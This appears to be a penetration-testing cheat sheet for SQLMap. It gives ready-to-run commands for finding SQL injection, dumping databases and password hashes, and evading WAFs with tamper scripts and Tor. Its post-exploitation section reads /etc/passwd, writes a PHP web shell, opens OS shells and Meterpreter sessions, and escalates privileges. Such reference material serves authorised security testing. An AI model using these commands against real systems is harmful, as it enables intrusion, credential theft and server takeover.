SQLMap

Overview

SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. It supports a wide range of database management systems and injection techniques.

Core Syntax

sqlmap [options] -u "URL" 
sqlmap [options] -r request.txt

Learning Workflow

Phase 1: Detection — Identify injectable parameters Phase 2: Enumeration — Map the database structure Phase 3: Extraction — Retrieve data from targets Phase 4: Advanced — Evasion, optimisation, and post-exploitation

Phase 1: Detection & Basic Testing

Target Specification

# URL with parameter (mark injectable param with *)
sqlmap -u "http://target.com/page.php?id=1"
sqlmap -u "http://target.com/page.php?id=1*&category=2"

# From Burp/ZAP saved request file
sqlmap -r request.txt

# Parse targets from sitemap
sqlmap -x "http://target.com/sitemap.xml"

# Direct database connection (for post-exploitation)
sqlmap -d "mysql://user:pass@target:3306/dbname"

Request Methods

# POST data
sqlmap -u "http://target.com/login.php" --data="user=admin&pass=test"

# Specify parameter to test
sqlmap -u "http://target.com/page.php?id=1&cat=2" -p id

# Test all parameters
sqlmap -u "http://target.com/page.php?id=1&cat=2" --level=5

# Cookie injection
sqlmap -u "http://target.com/page.php" --cookie="session=abc123; id=1*"

# Header injection
sqlmap -u "http://target.com/page.php" --headers="X-Forwarded-For: 127.0.0.1*"

# User-Agent injection
sqlmap -u "http://target.com/page.php" --user-agent="test" --level=3

Detection Options

# Increase detection level (1-5, default 1)
# Higher = more payloads, more parameters tested
sqlmap -u "URL" --level=3

# Increase risk level (1-3, default 1)
# Higher = more aggressive payloads (OR-based, heavy queries)
sqlmap -u "URL" --risk=3

# Full detection
sqlmap -u "URL" --level=5 --risk=3

# Test specific injection techniques
sqlmap -u "URL" --technique=BEUSTQ

Injection Techniques (`--technique`)

Letter

Technique

Description

B

Boolean-based blind

Infers data from true/false responses

E

Error-based

Extracts data from error messages

U

Union query-based

Uses UNION SELECT to retrieve data

S

Stacked queries

Executes multiple statements (;)

T

Time-based blind

Infers data from response delays

Q

Inline queries

Nested queries within other statements

# Test only union and error-based
sqlmap -u "URL" --technique=UE

# Test only blind techniques
sqlmap -u "URL" --technique=BT

Quick Detection Scan

# Fast detection, minimal output
sqlmap -u "http://target.com/page.php?id=1" --batch --smart

# Detect and identify DBMS only
sqlmap -u "URL" --fingerprint

# Check if parameter is injectable (no exploitation)
sqlmap -u "URL" --is-dba

Phase 2: Enumeration

Database Fingerprinting

# Identify DBMS
sqlmap -u "URL" --fingerprint

# Force specific DBMS (skip detection)
sqlmap -u "URL" --dbms=mysql
sqlmap -u "URL" --dbms=mssql
sqlmap -u "URL" --dbms=postgresql
sqlmap -u "URL" --dbms=oracle
sqlmap -u "URL" --dbms=sqlite

Information Gathering

# Get current user
sqlmap -u "URL" --current-user

# Get current database
sqlmap -u "URL" --current-db

# Check if current user is DBA
sqlmap -u "URL" --is-dba

# Get server hostname
sqlmap -u "URL" --hostname

# List all users
sqlmap -u "URL" --users

# List all databases
sqlmap -u "URL" --dbs

# Get DBMS banner
sqlmap -u "URL" --banner

Schema Enumeration

# List tables in a database
sqlmap -u "URL" -D database_name --tables

# List columns in a table
sqlmap -u "URL" -D database_name -T table_name --columns

# Count rows in table
sqlmap -u "URL" -D database_name -T table_name --count

# Full schema dump
sqlmap -u "URL" --schema

Standard Enumeration Workflow

# Step 1: List databases
sqlmap -u "URL" --dbs --batch

# Step 2: List tables in target database
sqlmap -u "URL" -D targetdb --tables --batch

# Step 3: List columns in target table
sqlmap -u "URL" -D targetdb -T users --columns --batch

# Step 4: Dump specific columns
sqlmap -u "URL" -D targetdb -T users -C username,password --dump --batch

Phase 3: Data Extraction

Dumping Data

# Dump entire table
sqlmap -u "URL" -D database -T table --dump

# Dump specific columns
sqlmap -u "URL" -D database -T table -C col1,col2 --dump

# Dump all tables in database
sqlmap -u "URL" -D database --dump-all

# Dump everything (all databases)
sqlmap -u "URL" --dump-all

# Limit rows returned
sqlmap -u "URL" -D db -T table --dump --start=1 --stop=100

# Dump with condition
sqlmap -u "URL" -D db -T table --dump --where="id>100"

Password Handling

# Dump passwords and attempt to crack
sqlmap -u "URL" --passwords

# Dump user password hashes
sqlmap -u "URL" -D db -T users -C password --dump

# Don't crack hashes (just dump)
sqlmap -u "URL" --passwords --no-crack

Search Functions

# Search for databases containing keyword
sqlmap -u "URL" --search -D admin

# Search for tables containing keyword
sqlmap -u "URL" --search -T user

# Search for columns containing keyword
sqlmap -u "URL" --search -C password

# Combined search
sqlmap -u "URL" --search -C email,pass,credit

Output Formats

# Output to CSV
sqlmap -u "URL" -D db -T table --dump --csv-del=";"

# Output directory
sqlmap -u "URL" --output-dir=/path/to/output

# Save traffic to HAR file
sqlmap -u "URL" --har=traffic.har

Phase 4: Advanced Techniques

Authentication

# Basic auth
sqlmap -u "URL" --auth-type=basic --auth-cred="user:pass"

# Digest auth
sqlmap -u "URL" --auth-type=digest --auth-cred="user:pass"

# NTLM auth
sqlmap -u "URL" --auth-type=ntlm --auth-cred="domain\\user:pass"

# Cookie-based session
sqlmap -u "URL" --cookie="PHPSESSID=abc123"

# Load cookies from file
sqlmap -u "URL" --load-cookies=cookies.txt

Proxy & Traffic

# Route through proxy
sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

# Proxy with auth
sqlmap -u "URL" --proxy="http://127.0.0.1:8080" --proxy-cred="user:pass"

# Route through Tor
sqlmap -u "URL" --tor --tor-type=SOCKS5

# Check Tor connection
sqlmap -u "URL" --tor --check-tor

Evasion Techniques

# Tamper scripts (modify payloads to bypass WAF/filters)
sqlmap -u "URL" --tamper=space2comment

# Multiple tamper scripts
sqlmap -u "URL" --tamper="space2comment,between,randomcase"

# Random User-Agent
sqlmap -u "URL" --random-agent

# Delay between requests (seconds)
sqlmap -u "URL" --delay=2

# Randomise delay
sqlmap -u "URL" --randomize=id

# Safe URL (visit between injections to stay logged in)
sqlmap -u "URL" --safe-url="http://target.com/home.php" --safe-freq=3

Common Tamper Scripts

Script

Purpose

space2comment

Replace spaces with /**/

space2plus

Replace spaces with +

space2randomblank

Replace spaces with random whitespace

between

Replace > with NOT BETWEEN 0 AND

randomcase

Randomize character case

charencode

URL-encode characters

base64encode

Base64 encode payload

equaltolike

Replace = with LIKE

greatest

Replace > with GREATEST

apostrophemask

Replace ' with UTF-8 equivalent

percentage

Add % between characters

# List all tamper scripts
sqlmap --list-tampers

# WAF bypass combination
sqlmap -u "URL" --tamper="space2comment,randomcase,between" --random-agent

Performance Optimization

# Number of threads (1-10)
sqlmap -u "URL" --threads=10

# Optimise for speed (combines multiple flags)
sqlmap -u "URL" -o

# Predict common values
sqlmap -u "URL" --predict-output

# Keep connection alive
sqlmap -u "URL" --keep-alive

# Null connection (for blind SQLi bandwidth saving)
sqlmap -u "URL" --null-connection

# Set timeout
sqlmap -u "URL" --timeout=30

Post-Exploitation

File System Access

# Read file from server
sqlmap -u "URL" --file-read="/etc/passwd"
sqlmap -u "URL" --file-read="C:/Windows/win.ini"

# Write file to server
sqlmap -u "URL" --file-write="local_shell.php" --file-dest="/var/www/html/shell.php"

# Upload file
sqlmap -u "URL" --file-write="payload.exe" --file-dest="C:/temp/payload.exe"

OS Command Execution

# Interactive OS shell
sqlmap -u "URL" --os-shell

# Execute single command
sqlmap -u "URL" --os-cmd="whoami"

# Spawn Meterpreter/VNC session
sqlmap -u "URL" --os-pwn

# Windows registry access
sqlmap -u "URL" --reg-read

Database Interaction

# Interactive SQL shell
sqlmap -u "URL" --sql-shell

# Execute SQL query
sqlmap -u "URL" --sql-query="SELECT user()"

# Execute SQL from file
sqlmap -u "URL" --sql-file=queries.sql

Privilege Escalation

# Attempt privilege escalation
sqlmap -u "URL" --priv-esc

# UDF injection (MySQL/PostgreSQL)
sqlmap -u "URL" --udf-inject

Workflow Examples

Full Assessment Workflow

# 1. Initial detection
sqlmap -u "http://target.com/page.php?id=1" --batch --smart

# 2. Deep detection if initial fails
sqlmap -u "http://target.com/page.php?id=1" --level=5 --risk=3 --batch

# 3. Enumerate after confirmed injectable
sqlmap -u "http://target.com/page.php?id=1" --dbs --batch

# 4. Target specific database
sqlmap -u "http://target.com/page.php?id=1" -D webapp --tables --batch

# 5. Extract high-value data
sqlmap -u "http://target.com/page.php?id=1" -D webapp -T users --dump --batch

# 6. Check for system access
sqlmap -u "http://target.com/page.php?id=1" --is-dba --batch
sqlmap -u "http://target.com/page.php?id=1" --os-shell

Testing From Burp Request

# 1. Save request from Burp to file
# 2. Mark injection point with *
# 3. Run SQLMap
sqlmap -r request.txt --batch --level=3

# With specific parameter
sqlmap -r request.txt -p "productId" --batch

WAF Bypass Workflow

# 1. Initial test (likely blocked)
sqlmap -u "URL" --batch

# 2. Add evasion
sqlmap -u "URL" --tamper=space2comment --random-agent --batch

# 3. Increase evasion
sqlmap -u "URL" --tamper="space2comment,between,randomcase" \
    --random-agent --delay=2 --batch

# 4. Try different technique
sqlmap -u "URL" --technique=T --tamper="space2comment,charencode" \
    --random-agent --delay=3 --batch

Session Management

# Save session data
sqlmap -u "URL" --output-dir=/path/to/output

# Resume previous session
sqlmap -u "URL" --resume

# Flush session (start fresh)
sqlmap -u "URL" --flush-session

# Session file location
# Default: ~/.local/share/sqlmap/output/

Useful Flag Combinations

Quick Detection

sqlmap -u "URL" --batch --smart

Stealth Mode

sqlmap -u "URL" --random-agent --delay=3 --tamper=space2comment \
    --technique=BT --batch

Maximum Detection

sqlmap -u "URL" --level=5 --risk=3 --threads=10 --batch

Full Dump

sqlmap -u "URL" -D database --dump-all --threads=5 --batch

Through Burp Proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080" --batch

Quick Reference Card

Task

Command

Basic test

sqlmap -u "URL" --batch

From request file

sqlmap -r req.txt --batch

List databases

sqlmap -u "URL" --dbs

List tables

sqlmap -u "URL" -D db --tables

List columns

sqlmap -u "URL" -D db -T tbl --columns

Dump table

sqlmap -u "URL" -D db -T tbl --dump

Get shell

sqlmap -u "URL" --os-shell

SQL shell

sqlmap -u "URL" --sql-shell

Current user

sqlmap -u "URL" --current-user

Check DBA

sqlmap -u "URL" --is-dba

Read file

sqlmap -u "URL" --file-read="/etc/passwd"

Use proxy

sqlmap -u "URL" --proxy="http://127.0.0.1:8080"

Bypass WAF

sqlmap -u "URL" --tamper=space2comment --random-agent

Max detection

sqlmap -u "URL" --level=5 --risk=3

Common Issues & Fixes

Issue

Solution

No injection found

Increase --level and --risk

WAF blocking

Add --tamper scripts and --random-agent

Session timeout

Use --safe-url with --safe-freq

Slow extraction

Increase --threads, use --technique=E,U

False positives

Use --string or --regexp to define true condition

HTTPS errors

Add --force-ssl

Connection issues

Adjust --timeout and --retries

PreviousNmap Scanning NextNetcat: Attack & Detection Techniques

Last updated 1 month ago

hashtagOverview

hashtagCore Syntax

hashtagLearning Workflow

hashtagPhase 1: Detection & Basic Testing

hashtagTarget Specification

hashtagRequest Methods

hashtagDetection Options

hashtagInjection Techniques (--technique)

hashtagQuick Detection Scan

hashtagPhase 2: Enumeration

hashtagDatabase Fingerprinting

hashtagInformation Gathering

hashtagSchema Enumeration

hashtagStandard Enumeration Workflow

hashtagPhase 3: Data Extraction

hashtagDumping Data

hashtagPassword Handling

hashtagSearch Functions

hashtagOutput Formats

hashtagPhase 4: Advanced Techniques

hashtagAuthentication

hashtagProxy & Traffic

hashtagEvasion Techniques

hashtagCommon Tamper Scripts

hashtagPerformance Optimization

hashtagPost-Exploitation

hashtagFile System Access

hashtagOS Command Execution

hashtagDatabase Interaction

hashtagPrivilege Escalation

hashtagWorkflow Examples

hashtagFull Assessment Workflow

hashtagTesting From Burp Request

hashtagWAF Bypass Workflow

hashtagSession Management

hashtagUseful Flag Combinations

hashtagQuick Detection

hashtagStealth Mode

hashtagMaximum Detection

hashtagFull Dump

hashtagThrough Burp Proxy

hashtagQuick Reference Card

hashtagCommon Issues & Fixes